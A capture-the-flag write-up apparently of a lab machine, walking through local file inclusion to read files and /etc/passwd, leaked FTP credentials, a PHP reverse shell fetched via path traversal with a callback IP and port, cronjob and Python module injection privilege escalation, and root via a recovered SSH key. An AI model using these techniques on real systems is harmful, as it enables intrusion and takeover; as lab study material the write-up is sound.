Initial foothold
As usual I set the boxip and scan it. 3 ports open, ftp, ssh and http.
Flag 1
Checking robots.txt we get a filename /flag_1.txt browse to it, we get our first flag.
Flag 2
Browsing to the second file we found in /robots.txt we get a forbidden access error.
Each post on the website however, link to a php file, this could be LFI. Using the post paramater and pointing it to secret_file_do_not_read.txt we get ftp credentials: ftpuser:givemefiles777
And note down that the ftp files are saved to /home/ftpuser/ftp/files/
By including the file ../../../../etc/passwd we get two potential users.
mat:x:1002:1002:,#,,:/home/mat:/bin/bash
toby:x:1003:1003:,,,:/home/toby:/bin/bash
ftp $(boxip) using the aforementioned credentials we get the second flag, and see the files folder.
User
Flag 3 & 4
Uploading a php shell and then browsing to http://10.10.179.149/post.php?post=../../../../home/ftpuser/ftp/files/cshell.php&ip=10.11.0.217&port=1234 we pop a www-data shell.
After checking sudo -l and getting a shell as user toby, I got flag 4, so I missed a flag.
Running find / -name flag_3.txt I found it in /var/www/html/more_secrets_a9f10a/flag_3.txt
Flag 5
Running LinPEAS is always a great idea, I found an interesting cronjob.
I added a reverse shell command to the shell script and a minute later the next shell popped.
And from that user I could grab flag 5.
Flag 6
Running sudo -l, we see we can run a script in /home/mat/scripts/will_scripts.py as the user will.
Inspecting the code, we see it imports a custom module named cmd. We do a module injection and write our own module which runs bash.
And get shell as will.
Of course I grabbed the flag aswell.
Root
Flag 7
Poking around, I eventually stumbled upon /etc/ssh
But it was a rabbit hole since I can’t read any of the interesting files there. Eventually I could see that will is part of the group adm. When I searched for all files belonging to that group something came up.
A base64 encrypted file. Putting it through cyberchef I got an rsa_id file content.
chmodding the file to 600 and using it with ssh, I got logged in as root.
Last flag snagged.
